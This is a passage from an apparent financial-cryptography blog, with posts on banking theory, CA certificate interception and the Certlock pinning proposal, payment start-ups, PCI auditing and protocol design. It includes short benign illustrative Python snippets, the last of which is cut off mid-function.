    • a building society or Savings & Loan is not doing banking, because .. it borrows from *members* who are by normal custom allowed to band together and do what they like with their money.
    • a mutual fund is not banking because the lenders are sophisticated individuals, and the borrowers are generally sophisticated as well.
    • Likewise, an investment bank does not deal with the public at all. So it's not banking. By this theory, it's really a financial investment house for savvy players (tell that to Deutschebank when it's chasing Goldman-Sachs for a missing billion...).

    So now we can see that there is actually a reason why the Central Banks are concerned about banks, but less so about funds, S&Ls, etc. Back to the definition:

    Banking is borrowing ... on demand, and lending those demand deposits ... at term.

    On demand means you walk into the bank and get your money back. Sounds quite reasonable. At term means you don't. You have to wait until the term expires. Then you get your money back. Hopefully.

    The bank has a demand obligation to the public lender, and a (long) term promise from the public borrower. This is quaintly called a maturity mismatch in the trade. What's with that?

    The bank is stuck between a rock and a hard place. Let's put more meat on these bones: if the bank borrows today, on demand, and lends that out at term, then in the future, it is totally dependent on the economy being kind to the people owing the money. That's called risk, and for that, banks make money.

    This might sound a bit dry, but Mervyn King, the Governor of the Bank of England, also recently took time to say it in even more dry terms (as spotted by Hasan):

    3. The theory of banking

    Why are banks so risky? The starting point is that banks make heavy use of short-term debt. Short-term debt holders can always run if they start to have doubts about an institution. Equity holders and long-term debt holders cannot cut and run so easily. Douglas Diamond and Philip Dybvig showed nearly thirty years ago that this can create fragile institutions even in the absence of risk associated with the assets that a bank holds. All that is required is a cost to the liquidation of long-term assets and that banks serve customers on a first-come, first-served basis (Diamond and Dybvig, 1983).

    This is not ordinary risk. For various important reasons, banking risk is extraordinary risk, because no bank, no matter which one we are talking about, can deal with unexpected risks that shift the economy against it. Such risks manifest themselves as an increase in defaults, that is, when the long term money doesn't come back at all.

    Another view on this same problem is when the lending public perceive a problem, and decide to get their money out. That's called a run; no bank can deal with unexpected shifts in public perception, and all the lending public know this, so they run to get the money out. Which isn't there, because it is all lent out.

    (If this is today, and you're in Ireland, read quietly...)

    A third view on this is the legal definition of fraud: making deceptive statements, by entering into contracts that you know you cannot meet, with an intent to make a profit. By this view, a bank enters into a fraudulent contract with the demand depositor, because the bank knows (as does everyone else) that the bank cannot meet the demand contract for everyone, only for around 1-2% of the depositors.
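    To put toy numbers on that maturity mismatch (the 2% reserve echoes the figure above; everything else is invented for illustration):

    # Toy bank: deposits are repayable on demand, but nearly all of them are
    # lent out at term and cannot be called back today.
    deposits = 100.0                  # owed to the public, on demand
    reserve_ratio = 0.02              # cash actually kept on hand (~2%)
    cash = deposits * reserve_ratio   # 2.0 available today
    loans_at_term = deposits - cash   # 98.0 locked up until the loans mature

    def paid_out(demanded):
        """How much of today's withdrawal demand the bank can actually meet."""
        return min(demanded, cash)

    for demanded in (1.0, 5.0, 20.0):
        paid = paid_out(demanded)
        status = "fine" if paid == demanded else "RUN: the bank cannot pay"
        print(f"depositors ask for {demanded:5.1f} -> paid {paid:4.1f}  ({status})")
    # A normal day (1% asking) is fine; the moment perception shifts and 5% or
    # 20% ask at once, the demand contract cannot be met.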

    Historically, however, banking was very valuable. Recall Mr Rothschild's goal of "facilitating the movement of money from Point A, where it is, to Point B, where it is needed." It was necessary for society because we simply had no other efficient way of getting small savings from the left to large and small projects on the right. Banking was essential for the rise of modern civilisation, or so suggests Mervyn King, in an earlier speech:

    Writing in 1826, under the pseudonym of Malachi Malagrowther, [Sir Walter Scott] observed that:
    "Not only did the Banks dispersed throughout Scotland afford the means of bringing the country to an unexpected and almost marvellous degree of prosperity, but in no considerable instance, save one [the Ayr Bank], have their own over-speculating undertakings been the means of interrupting that prosperity".

    Banking developed for a fairly long period, but as a matter of historical fact, it eventually settled on a structure known as central banking [1]. It's also worth mentioning that this historical development of central banking is the history of the Bank of England, and the Governor is therefore the custodian of that evolution.

    Then, the Central Bank was the /lender of last resort/ who would stop the run.

    Nevertheless, there are benefits to this maturity transformation - funds can be pooled allowing a greater proportion to be directed to long-term illiquid investments, and less held back to meet individual needs for liquidity. And from Diamond's and Dybvig's insights, flows an intellectual foundation for many of the policy structures that we have today - especially deposit insurance and Bagehot's time-honoured key principle of central banks acting as lender of last resort in a crisis.

    Regulation and the structure we know today therefore rest on three columns:

    1. the function of lender of last resort, which is itself required only because of the improbable contract of demand deposits being lent out at term,
    2. the public responsibility of public lending and public borrowing, and
    3. the public interest in providing prosperity for all.

    That which we know today as banking is really central banking. Later on, we find refinements such as the BIS and their capital ratio, the concept of big strong banks, national champions, coinage and issuance, interest rate targets, non-banking banking, best practices and stress testing, etc etc. All these followed in due course, often accompanied with a view of bigger, stronger, more diversified.

    Which sets half of the scene for how the global financial crisis is slowly pushing us closer to our future. The other half in a future post, but in the meantime, dwell on this: Why is Mervyn King, as the Guv of the Old Lady of Threadneedle Street (a.k.a. Bank of England), spending time teaching us all about banking?


    1. What banking is. (Essential for predicting the end of finance as we know it.)

    2. What caused the financial crisis. (Laying bare the end of banking.)

    3. A small amount of Evidence. (In which, the end of banking and the rise of markets is suggested.)

    4. Mervyn King calls us to the Old Lady's deathbed?

    [1] Slight handwaving dance here as we sidestep past Scotland, and let's head back to England. I'm being slightly innocent with the truth here, and ignoring the pointed reference to Scotland.

    Posted by iang at 07:25 AM | Comments (3) | TrackBack

    August 24, 2010

    What would the auditor say to this?

    Iran's Bushehr nuclear power plant in Bushehr Port:

    "An error is seen on a computer screen of Bushehr nuclear power plant's map in the Bushehr Port on the Persian Gulf, 1,000 kms south of Tehran, Iran on February 25, 2009. Iranian officials said the long-awaited power plant was expected to become operational last fall but its construction was plagued by several setbacks, including difficulties in procuring its remaining equipment and the necessary uranium fuel. (UPI Photo/Mohammad Kheirkhah)"

    Click onwards for full sized image:

    Compliant? Minor problem? Slight discordance? Conspiracy theory?

    (spotted by Steve Bellovin)

    Posted by iang at 05:53 AM | Comments (2) | TrackBack

    August 13, 2010

    Turning the Honeypot

    I'm reading a govt. security manual this weekend, because ... well, doesn't everyone?

    To give it some grounding, I'm building up a cross-reference against my work at the CA. I expected it to remain rather dry until the very end, but I've just tripped up on this Risk in the section on detecting incidents:

    2.5.7. An agency constructs a honeypot or honeynet to assist in capturing intrusion attempts, resulting in legal action being taken against the agency for breach of privacy.

    My-oh-my!

    Posted by iang at 08:06 PM | Comments (4) | TrackBack

    August 12, 2010

    memes in infosec II - War! Infosec is WAR!

    Another metaphor (I) that has gained popularity is that infosec is much like war. There are some reasons for this: there is an aggressive attacker out there who is trying to defeat you, which tends to muck up a lot of statistical, error-based thinking in IT, a lot of business process, and most economic models as well (e.g., asymmetric information assumes a simple two-party model). Another reason is the current beltway push for an essential cyberwarfare divisional budget, although I'd hasten to say that this is not a good reason, just a reason. Which is to say, it's all blather, FUD, and one-upmanship against the Chinese, same as it ever was with Eisenhower's nemesis.

    Having said that, infosec isn't like war in many ways. And knowing when and why and how is not a trivial thing. So, drawing from military writings is not without dangers. Consider these laments about applying Sun Tzu's The Art of War to infosec from Steve Tornio and Brian Martin:

    In "The Art of War," Sun Tzu's writing addressed a variety of military tactics, very few of which can truly be extrapolated into modern InfoSec practices. The parts that do apply aren't terribly groundbreaking and may actually conflict with other tenets when artificially applied to InfoSec. Rather than accept that Tzu's work is not relevant to modern day Infosec, people tend to force analogies and stretch comparisons to his work. These big leaps are professionals whoring themselves just to get in what seems like a cool reference and wise quote.

    "The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own readiness to receive him; not on the chance of his not attacking, but rather on the fact that we have made our position unassailable." - The Art of War

    The Art of War is not for literal quoting and a mad rush to build the tool. It was written from the context of a successful general talking to another hopeful general, on the general topic of building an army for a set-piece nation-to-nation confrontation. It was also very short.

    The Art of War tends to interlace high-level principles with low-level examples, and dances very quickly through most of its lessons. Hence it is very easy to misinterpret, and equally easy to "whore oneself for a cool & wise quote."

    However, Sun Tzu still stands tall in the face of such disrespect, as it says things like know yourself FIRST, and know the enemy SECOND, which the above essay actually agreed with. And, as if it needs to be said, knowing the enemy does not imply knowing their names, locations, genders, and proclivities:

    Do you know your enemy? If you answer 'yes' to that question, you already lost the battle and the war. If you know some of your enemies, you are well on your way to understanding why Tzu's teachings haven't been relevant to InfoSec for over two decades. Do you want to know your enemy? Fine, here you go. your enemy may be any or all of the following:

    • 12 y/o student in Ohio learning computers in middle school
    • 13 y/o home-schooled girl getting bored with social networks
    • 15 y/o kid in Brazil that joined a defacement group
    • ...

    Of course, Sun Tzu also didn't know the sordid details of every soldier's desires; "knowing" isn't biblical, it's about capability. Knowing the enemy's capabilities can be done, and we have a name for it: risk management. As Jeffrey Carr said:

    The reason why you don't know how to assign or even begin to think about attribution is because you are too consumed by the minutia of your profession. ... The only reason why some (OK, many) InfoSec engineers haven't put 2+2 together is that their entire industry has been built around providing automated solutions at the microcosmic level. When that's all you've got, you're right - you'll never be able to claim victory.

    Right. Almost all InfoSec engineers are hired to protect existing installations. The solution is almost always boxed into the defensive, siege mentality described above, because the alternative is, as Dan Geer apparently said:

    When you are losing a game that you cannot afford to lose, change the rules. The central rule today has been to have a shield for every arrow. But you can't carry enough shields and you can run faster with fewer anyhow.

    The advanced persistent threat, which is to say the offense that enjoys a permanent advantage and is already funding its R&D out of revenue, will win as long as you try to block what he does. You have to change the rules. You have to block his success from even being possible, not exchange volleys of ever better tools designed in response to his. You have to concentrate on outcomes, you have to pre-empt, you have to be your own intelligence agency, you have to instrument your enterprise, you have to instrument your data.

    But, at a corporate level, that's simply not allowed. Great ideas, but only the achievable strategy is useful, the rest is fantasy. You can't walk into any company or government department and change the rules of infosec -- that means rebuilding the apps. You can't even get any institution to agree that their apps are insecure; or, you can get silent agreement by embarrassing them in the press, along with being fired!

    I speak from pretty good experience of building secure apps, and of looking at other institutional or enterprise apps and packages. The difference is huge. It's the difference between defeating Japan and defeating Vietnam. One was a decision of maximisation, the other of minimisation. It's the difference between engineering and marketing; one is solid physics, the other is facade, faith, FUD, bribes.

    It's the difference between setting up a world-beating sigint division, and fixing your own sigsec. The first is a science, and responds well to adding money and people. Think Manhattan, Bletchley Park. The second is a societal norm, and responds only to methods generally classed by the defenders as crimes against humanity and applications. Slavery, colonialism, discrimination, the great firewall of China: if you really believe in stopping these things, then you are heading for war with your own people.

    Which might all lead the grumpy anti-Sun Tzu crowd to say, "told you so! This war is unwinnable." Well, not quite. The trick is to decide what winning is; to impose your will on the battleground. This is indeed what strategy is: to impose one's own definition of the battleground on the enemy, and be right about it, which is partly what Dan Geer is getting at when he says "change the rules." A more nuanced view would be: to set the rules that win for you, and to make them the rules you play by.

    And, this is pretty easily answered: for a company, winning means profits. As long as your company can conduct its strategy in the face of affordable losses, then it's winning. Think credit cards, which sacrifice a few hundred basis points for the greater good. It really doesn't matter how much of a loss is made, as long as the customer pays for it and leaves a healthy profit over.

    Relevance to Sun Tzu? The parable of the Emperor's Concubines!

    In summary, it is fair to say that Sun Tzu is one of those texts that are easy to bandy around, but rather hard to interpret. Same as infosec, really, so it is no surprise we see it in that world. Also, war is a very complicated business, and The Art of War was really written for that messy discipline ... so it takes rather more than a passing familiarity with both to relate them beyond the level of simple metaphor.

    And, as we know, metaphors and analogues are descriptive tools, not proofs. Proving them wrong proves nothing more than you're now at least an adolescent.

    Finally, even war isn't much like war these days. If one factors in the last decade, there is a clear pattern of unilateral decisions, casus belli at a price, futile targets, and effervescent gains. Indeed, infosec looks more like the low intensity, mission-shy wars in the Eastern theaters than either of them look like Sun Tzu's campaigns.

    memes in infosec I - Eve and Mallory are missing, presumed dead

    Posted by iang at 04:34 PM | Comments (1) | TrackBack

    May 19, 2010

    blasts from the past -- old predictions come true

    Some things I've seen lately match predictions from a long time back. None was exciting enough to merit an entire blog post, but together they are sufficient to blow the trumpet in orchestra:

    Chris Skinner of The Finanser puts up his old post written in 1997, which says that retailers (Tesco and Sainsbury's) would make fine banks, and were angling for it. Yet:

    Thirteen years later, we talk about Tesco and Virgin breaking into UK banking again.

    A note of caution: after thirteen years, these names have not made a dent on these markets. Will they in the next thirteen years?

    Answer: in 1997, none of these brands stood a cat in hell’s chance of getting a banking licence. Today, Virgin and Tesco have banking licences.

    Exactly. As my 1996 paper on electronic money in Europe also made somewhat clear, the regulatory approach of the times was captured by the banks, for the banks, of the banks. The intention of the 1994 directive was to stop new entrants in payments, and it did that quite well. So much so that they got walloped by the inevitable (and predicted) takeover by foreign entrants such as Paypal.

    However, regulators in the European Commission working group(s) seemed not to like the result. They tried again in 2000 to open up the market, but again didn't quite realise what a barrier was, and didn't spot the clauses slipped in that killed the market. Then, in 2008, they got it more right with the latest eMoney directive, which actually has a snowball's chance in hell. Banking regulations and the PSD (Payment Services Directive) also opened things up a lot, which explains why Virgin and Tesco today have their licences.

    One more iteration and this might make the sector competitive...

    Then, over on the Economist, an article on task markets

    Over the past few years a host of fast-growing firms such as Elance, oDesk and LiveOps have begun to take advantage of “the cloud”—tech-speak for the combination of ubiquitous fast internet connections and cheap, plentiful web-based computing power—to deliver sophisticated software that makes it easier to monitor and manage remote workers. Maynard Webb, the boss of LiveOps, which runs virtual call centres with an army of over 20,000 home workers in America, says the company’s revenue exceeded $125m in 2009. He is confidently expecting a sixth year of double-digit growth this year.

    Although numerous online exchanges still act primarily as brokers between employers in rich countries and workers in poorer ones, the number of rich-world freelancers is growing. Gary Swart, the boss of oDesk, says the number of freelancers registered with the firm in America has risen from 28,000 at the end of 2008 to 247,000 at the end of April.

    Back in 1997, I wrote about how to do task markets, and I built a system to do it as well. The system worked fine, but it lacked a couple of key external elements, so I didn't pursue it. Quite a few companies popped up over the next decade, in successive waves, and hit the same barriers.

    Those elements are partly in place these days (but still partly not) so it is unsurprising that companies are getting better at it.

    And, over on this blog by Eric Rescorla, he argues against rekeying in a cryptographically secure protocol:

    It's IETF time again and recently I've reviewed a bunch of drafts concerned with cryptographic rekeying. In my opinion, rekeying is massively overrated, but apparently I've never bothered to comprehensively address the usual arguments.

    Which I wholly concur with, as I've fought about all sorts of agility before (See H1 and H3). Rekeying is yet another sign of a designer gone mad, on par with mumbling to the moon and washing imaginary spots from hands.

    The basic argument here is that rekeying tries to maintain a clean record of security in a connection; yet this is impossible, because there will always be other reasons why the thing fails. Therefore, the application must be able to restart from scratch, regardless; and rekeying can be done then, without a problem. QED. What is sad about this argument is that once you understand the architectural issues, it has far too many knock-on effects, ones that might even put you out of a job, so it isn't a *popular argument* amongst security designers.

    Oh well. But it is good to see some challenging of the false gods....

    An article "Why Hawks Win," examines national security, or what passes for military and geopolitical debate in Washington DC.

    In fact, when we constructed a list of the biases uncovered in 40 years of psychological research, we were startled by what we found: All the biases in our list favor hawks. These psychological impulses -- only a few of which we discuss here -- incline national leaders to exaggerate the evil intentions of adversaries, to misjudge how adversaries perceive them, to be overly sanguine when hostilities start, and overly reluctant to make necessary concessions in negotiations. In short, these biases have the effect of making wars more likely to begin and more difficult to end.

    It's not talking about information security, but the analysis seems to resonate. In short, it establishes a strong claim that in a market where there is insufficient information (c.f., the market for silver bullets), we will tend to fall to a FUD campaign. Our psychological biases will carry us in that direction.

    Posted by iang at 09:44 PM | Comments (3) | TrackBack

    March 29, 2010

    Pushing the CA into taking responsibility for the MITM

    This ArsTechnica article explores what happens when a CA-supplied certificate is used to mount an MITM on some SSL connection protecting online banking or similar. In the secure-lite model that emerged after the real-estate wars of the mid-1990s, consumers were told to click on their tiny padlock to check the cert:

    Now, a careful observer might be able to detect this. Amazon's certificate, for example, should be issued by VeriSign. If it suddenly changed to be signed by Etisalat (the UAE's national phone company), this could be noticed by someone clicking the padlock to view the detailed certificate information. But few people do this in practice, and even fewer people know who should be issuing the certificates for a given organization.
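    What "clicking the padlock" amounts to, in code terms, is fetching the site's certificate and looking at who issued it. A minimal Python sketch (mine, not from the article; the hostname is only an example):

        import socket, ssl

        def issuer_of(host, port=443):
            # Fetch the leaf certificate presented by the host and return its issuer fields.
            ctx = ssl.create_default_context()
            with socket.create_connection((host, port)) as sock:
                with ctx.wrap_socket(sock, server_hostname=host) as tls:
                    cert = tls.getpeercert()   # parsed dict of the verified leaf certificate
            # 'issuer' is a tuple of RDNs, e.g. ((('organizationName', 'Example CA'),), ...)
            return {name: value for rdn in cert['issuer'] for (name, value) in rdn}

        print(issuer_of('www.amazon.com').get('organizationName'))

    (The output is just the issuing organisation's name; knowing whether that is the right name is the hard part.)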

    Right, so where does this go? Well, people don't notice because they can't. Put the CA on the chrome and people will notice. What then?

    A switch in CA is a very significant event. Jane Public might not be able to do anything about it, but if a customer of Verisign's was MITM'd by a cert from Etisalat, this is something that affects Verisign. We might reasonably expect Verisign to be interested in that. As it affects the chrome, and as customers might get annoyed, we might even expect Verisign to treat this as an attack on their good reputation.

    And that's why putting the brand of the CA onto the chrome is so important: it's the only real way to bring pressure to bear on a CA to get it to lift its game. Security, reputation, sales. These things are all on the line when there is a handle to grasp by the public.

    When the public has no handle on what is going on, the deal falls back into the shadows. No security there; in the shadows we find audit, contracts, outsourcing. Got a problem? Shrug. It doesn't affect our sales.

    So, what happens when a CA MITM's its own customer?

    Even this is limited; if VeriSign issued the original certificate as well as the compelled certificate, no one would be any the wiser. The researchers have devised a Firefox plug-in that should be released shortly that will attempt to detect particularly unusual situations (such as a US-based company with a China-issued certificate), but this is far from sufficient.

    Arguably, this is not an MITM, because the CA is the authority (not the subscriber) ... but exotic legal arguments aside, we clearly don't want it. When it does go on, what we need is software to catch it: whitelisting, Conspiracy, and the other ideas floating around.

    And, we need the CA-on-the-chrome idea so that the responsibility aspect is established. CAs shouldn't be able to MITM other CAs. If we can establish that, with teeth, then the CA-against-itself case is far easier to deal with.

    Posted by iang at 11:20 PM | Comments (7) | TrackBack

    March 24, 2010

    Why the browsers must change their old SSL security (?) model

    In a paper, "Certified Lies: Detecting and Defeating Government Interception Attacks Against SSL", by Christopher Soghoian and Sid Stamm, there is a reasonably good layout of the problem that browsers face in delivering their "one-model-suits-all" security model. It is more or less what we've understood all these years: by accepting an entire root list of hundreds of CAs, there is no barrier to any one of them going a little rogue.

    Of course, it is easy to raise the hypothetical of the rogue CA, and even to show compelling evidence of business models (they cover much the same claims with a CA that also works in the lawful intercept business that was covered here in FC many years ago). Beyond theoretical or probable evidence, it seems the authors have stumbled on some evidence that it is happening:

    The company’s CEO, Victor Oppelman confirmed, in a conversation with the author at the company’s booth, the claims made in their marketing materials: That government customers have compelled CAs into issuing certificates for use in surveillance operations. While Mr Oppelman would not reveal which governments have purchased the 5-series device, he did confirm that it has been sold both domestically and to foreign customers.

    (my emphasis.) This has been a lurking problem underlying all CAs since the beginning. The flip side of the trusted-third-party concept ("TTP") is the centralised-vulnerability-party or "CVP". That is, you may have been told you "trust" your TTP, but in reality, you are totally vulnerable to it. E.g., from the famous Blackberry "official spyware" case:

    Nevertheless, hundreds of millions of people around the world, most of whom have never heard of Etisalat, unknowingly depend upon a company that has intentionally delivered spyware to its own paying customers, to protect their own communications security.

    Which becomes worse when the browsers insist, not without good reason, that the root list is hidden from the consumer. The problem that occurs here is that the compelled CA problem multiplies to the square of the number of roots: if a CA in (say) Ecuador is compelled to deliver a rogue cert, then that can be used against a CA in Korea, and indeed all the other CAs. A brief examination of the ways in which CAs work, and browsers interact with CAs, leads one to the unfortunate conclusion that nobody in the CAs, and nobody in the browsers, can do a darn thing about it.

    So it then falls to a question of statistics: at what point do we believe that there are so many CAs in there that the chance of getting away with a little interception is too enticing? The square law says the exposure is something like 100 CAs squared, or 10,000 times the chance of any one intercept; put the other way around, resistance to the temptation holds in all but 0.01% of circumstances. OK, pretty scratchy maths, but it does indicate that the temptation is a small but not infinitesimal number. A risk exists, in words, and in numbers.

    One CA can hide amongst the crowd, but there is a little bit of a fix to open up that crowd. This fix is to simply show the user the CA brand, to put faces on the crowd. Think of the above, and while it doesn't solve the underlying weakness of the CVP, it does mean that the mathematics of squared vulnerability collapses. Once a user sees their CA has changed, or has a chance of seeing it, hiding amongst the crowd of CAs is no longer as easy.

    Why then do browsers resist this fix? There is one good reason, which is that consumers really don't care and don't want to care. In more particular terms, they do not want to be bothered by security models, and the security displays in the past have never worked out. Gerv puts it this way in comments:

    Security UI comes at a cost - a cost in complexity of UI and of message, and in potential user confusion. We should only present users with UI which enables them to make meaningful decisions based on information they have.

    They love Skype, which gives them everything they need without asking them anything. That should be reasonable enough motive to follow those lessons, but the context is different. Skype is in the chat & voice market, and the security model it has chosen is well in excess of the needs there. Browsing, on the other hand, is in the credit-card shopping and Internet online banking market, and the security model imposed by the mid-1990s evolution of uncontrollable forces has now broken before the onslaught of phishing & friends.

    In other words, for browsing, the writing is on the wall. Why then don't they move? In a perceptive footnote, the authors also ponder this conundrum:

    3. The browser vendors wield considerable theoretical power over each CA. Any CA no longer trusted by the major browsers will have an impossible time attracting or retaining clients, as visitors to those clients’ websites will be greeted by a scary browser warning each time they attempt to establish a secure connection. Nevertheless, the browser vendors appear loathe to actually drop CAs that engage in inappropriate behavior — a rather lengthy list of bad CA practices that have not resulted in the CAs being dropped by one browser vendor can be seen in [6].

    I have observed this for a long time now, predicting phishing until it became the flood of fraud. The answer is, to my mind, a complicated one which I can only paraphrase.

    For Mozilla, the reason is a simple lack of security capability at the *architectural* and *governance* levels. Indeed, it should be noticed that this lack of capability is their policy, as they deliberately and explicitly outsource the big security questions to others (known as the "standards groups", such as the IETF's RFC committees). As they have little of the capability, they aren't in a good position to use the power, whether they would want to or not. So it only needs a mildly argumentative approach on the part of the others, and Mozilla is restrained from its apparent power.

    What then of Microsoft? Well, they certainly have the capability, but they have other fish to fry. They aren't fussed about the power because it doesn't bring them anything of use. As a corporation, they are strictly interested in shareholders' profits (by law and by custom), and as nobody can show them a bottom-line improvement from the CA & cert business, no interest is generated. And without that interest, it is practically impossible to get the many and various groups within Microsoft to move.

    Unlike Mozilla, my view of Microsoft is much more "external", based on many observations that have never been confirmed internally. However it seems to fit; all of their security work has been directed to market interests. Hence for example their work in identity & authentication (.net, infocard, etc) was all directed at creating the platform for capturing the future market.

    What is odd is that all CAs agree that they want their logo on their browser real estate. Big and small. So one would think that there was a unified approach to this, and it would eventually win the day; the browser wins for advancing security, the CAs win because their brand investments now make sense. The consumer wins for both reasons. Indeed, early recommendations from the CABForum, a closed group of CAs and browsers, had these fixes in there.

    But these ideas keep running up against resistance, and none of the resistance makes any sense. And that is probably the best way to think of it: the browsers don't have a logical model for where to go for security, so anything leaps the bar when the level is set to zero.

    Which all leads to a new group of people trying to solve the problem. The authors present their model as this:

    The Firefox browser already retains history data for all visited websites. We have simply modified the browser to cause it to retain slightly more information. Thus, for each new SSL protected website that the user visits, a Certlock enabled browser also caches the following additional certificate information:
    A hash of the certificate.
    The country of the issuing CA.
    The name of the CA.
    The country of the website.
    The name of the website.
    The entire chain of trust up to the root CA.

    When a user re-visits a SSL protected website, Certlock first calculates the hash of the site’s certificate and compares it to the stored hash from previous visits. If it hasn’t changed, the page is loaded without warning. If the certificate has changed, the CAs that issued the old and new certificates are compared. If the CAs are the same, or from the same country, the page is loaded without any warning. If, on the other hand, the CAs’ countries differ, then the user will see a warning (See Figure 3).
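    To make that logic concrete, here is a rough sketch of the pin-and-compare step (my own sketch, not the authors' code), assuming the issuing CA's name and country have already been extracted from the old and new certificates:

        import hashlib

        # store maps hostname -> (cert_hash, ca_name, ca_country) from previous visits
        def check_certificate(store, host, cert_der, ca_name, ca_country):
            cert_hash = hashlib.sha256(cert_der).hexdigest()
            previous = store.get(host)
            if previous is None or previous[0] == cert_hash:
                store[host] = (cert_hash, ca_name, ca_country)
                return "ok"        # first visit, or certificate unchanged
            _, old_name, old_country = previous
            if ca_name == old_name or ca_country == old_country:
                store[host] = (cert_hash, ca_name, ca_country)
                return "ok"        # re-issued by the same CA, or by a CA in the same country
            return "warn"          # issuing CA changed country: show the warning

    The interesting design choice is the fallback to country rather than to the individual CA, which is what the criticism below turns on.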

    This isn't new. The authors credit recent work, but no further back than a year or two. Which I find sad because the important work done by TrustBar and Petnames is pretty much forgotten.

    But it is encouraging that the security models are battling it out, because it gets people thinking, and challenging their assumptions. Only actual produced code, and garnered market share is likely to change the security benefits of the users. So while we can criticise the country approach (it assumes a sort of magical touch of law within the countries concerned that is already assumed not to exist, by dint of us being here in the first place), the country "proxy" is much better than nothing, and it gets us closer to the real information: the CA.

    From a market for security pov, it is an interesting period. The first attempts around 2004-2006 in this area failed. This time, the resurgence seems to have a little more steam, and possibly now is a better time. In 2004-2006 the threat was seen as more or less theoretical by the hoi polloi. Now however we've got governments interested, consumers sick of it, and the entire military-industrial complex obsessed with it (both in participating and fighting). So perhaps the newcomers can ride this wave of FUD in, where previous attempts drowned far from the shore.

    Posted by iang at 07:52 PM | Comments (1) | TrackBack

    January 21, 2010

    news v. not-news, the great phone-payments debate rumbles on

    Someone told me last night that payments would get better when done on the phone! Yessssss.... how does one comment on that? And today I spotted this:

    Everyone's getting real excited about Jack Dorsey, the co-founder of Twitter, and his new payments application for the iPhone called Square.

    OK, except we've seen it all before. Remember Paypal? No, not the one you now know, but the original one, on a PDA. So the process is being repeated. First, do the stuff that looks sexy on the platform that gets you the buzz-appeal. And then, move to where the market is: merchants who pay fees. And, here's where the founder is being more than normally forthright:

    ... the biggest friction point around accepting credit cards is actually getting a merchant account. So being able to become someone who actually can accept a payment off a credit card, off a prepaid card, off a debit card, is actually quite difficult, and it takes a long time – it's a very complicated process. So we wanted to get people in and accepting this new form of payments, and this very widely used form of payments in under 10 seconds.

    Exactly the same. And the one before that -- First Virtual :) And I recall another after that which was popular in the media: peppercoin. And and and... So when Chris Skinner says

    The thing is that Square is good for the American markets, but it is very last century because it focuses upon a card's magnetic stripe and signature for authentication. That's the way Americans pay for things but other markets have moved away from this as it is so insecure.

    He's right in that it is very last century. But Skinner is concentrating on the technology, whereas Dorsey is looking at the market. Thus, maybe right conclusions, but the wrong reasons. What are the right reasons?

    Last century was the century of Central Banking. One of the artifacts of this was that banks and payment systems were twinned, joined at the hip, the latter granted as a favour to the former. However, as we move forward, several things have loosened that tight grip. Chief amongst them: securitization, the financial crisis, financial cryptography, the cost of hardware and the rise of the net.

    So, the observation of many is that the phone is now the real platform of choice, and not the Xiring, which is just an embarrassing hack in comparison. And, the institution that can couple the phone to the application in a secure and user-friendly way is the winner.

    Question then is, how will this unfold? Well, it will unfold in the normal entrepreneurship fashion. Several waves of better and better payment systems will emerge from the private sector, to compete, live and die and be swallowed by banks. Hundreds of attempts every year, and one success, every year. Gradually, the experiments will pay off, literally and ideas-wise, and gradually people will read the real story about how to do it (you know where) and increase the success ratio from 1:100 to 1:10.

    And, gradually, payments will stand separate from banks. It might take another 20 years, but that's short in the comparison to the time it took for the dinosaurs to fade away, so just be patient.

    Posted by iang at 04:02 PM | Comments (3) | TrackBack

    December 29, 2009

    pushback against the external auditor (if they can do it, so can you!)

    Lynn in comments points to news that MasterCard has eased up on the PCI (Payment Card Industry) standard for merchant auditing:

    But come Dec. 31, 2010, MasterCard planned to require that all Level 1 and, for the first time, Level 2 merchants, use a QSA for the annual on-site PCI assessment.

    (Level 1 merchants are above 6 million transactions per year, with 352 merchants bringing in around 50% of all transactions in the USA. Level 2 merchants are from 1 to 6 million transactions, some 895 merchants and around 13% of all transactions.)

    Now, this rule would have cost your merchant hard money:

    That policy generated many complaints from Level 2 merchants, who security experts say would have to pay anywhere from $100,000 to $1 million for a QSA’s services.

    These Qualified Security Assessors (QSAs) are certified by the PCI Security Standards Council to do the on-site assessment, or audit. Because of the pushback, complaints, etc, MasterCard backed down:

    This month, however, MasterCard pushed back the deadline by six months, to June 30, 2011. And instead of requiring use of a QSA, MasterCard will let Level 2 merchants do the assessments themselves provided they have staff attend merchant-training courses offered by the PCI Council, and each year pass a PCI Council accreditation program. Level 2 merchants are free to use QSAs if they wish. Come June 30, 2011, Level 1 merchants can use an internal auditor provided the audit staff has PCI Council training and annual accreditation.

    That's you, that is. Or close enough that it hurts. Your company, being a retail merchant bringing in say 100 million dollars a year over 1 million transactions, can now save itself some $100,000 to $1 million. You can do it with your own staff as long as they go on some courses.

    If a merchant with millions to billions of direct value on the line, and measurable losses of say 1% of that (handwave and duck) can choose to self-audit, why can't you?

    Posted by iang at 11:09 AM | Comments (1) | TrackBack

    December 07, 2009

    H4.3 - Simplicity is Inversely Proportional to the Number of Designers

    Which reminds me to push out yet another outrageous chapter in secure protocol design. In my hypothesis #4 on Protocol Design, I claim this:

    #4.3 Simplicity is Inversely Proportional to the Number of Designers
    Never doubt that a small group of thoughtful, committed citizens can change the world. Indeed, it is the only thing that ever has.
    Margaret Mead

    Simplicity is proportional to the inverse of the number of designers. Or is it that complexity is proportional to the square of the number of designers?

    Sad but true, if you look at the classic best of breed protocols like SSH and PGP, they delivered their best results when one person designed them. Even SSL was mostly secure to begin with, and it was only the introduction of PKI with its committees, world-scale identity models, digital signature laws, accountants and lawyers that sent it into orbit around Pluto. Committee-designed monsters such as IPSec and DNSSEC aren't even in the running.

    Sometimes a protocol can survive a team of two, but we are taking huge risks (remember, the biggest failure mode of all is failing to deliver anything). Either compromise with your co-designer quickly or kill him. Your users will thank you for either choice; they do not benefit if you are locked in a deadly embrace over the sublime but pernickety benefits of MAC-then-encrypt over encrypt-then-MAC, or CBC versus Counter-mode, or or or...
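    (For anyone who hasn't met that particular deadly embrace: the argument is over whether the integrity check covers the ciphertext or the plaintext. Purely as an illustration, and not a recommendation either way, a minimal encrypt-then-MAC sketch using the pyca/cryptography package looks something like this:)

        import hmac, hashlib, os
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

        def seal(enc_key, mac_key, plaintext):
            nonce = os.urandom(16)
            enc = Cipher(algorithms.AES(enc_key), modes.CTR(nonce)).encryptor()
            ct = enc.update(plaintext) + enc.finalize()
            tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()  # MAC over nonce + ciphertext
            return nonce + ct + tag

        def open_sealed(enc_key, mac_key, blob):
            nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
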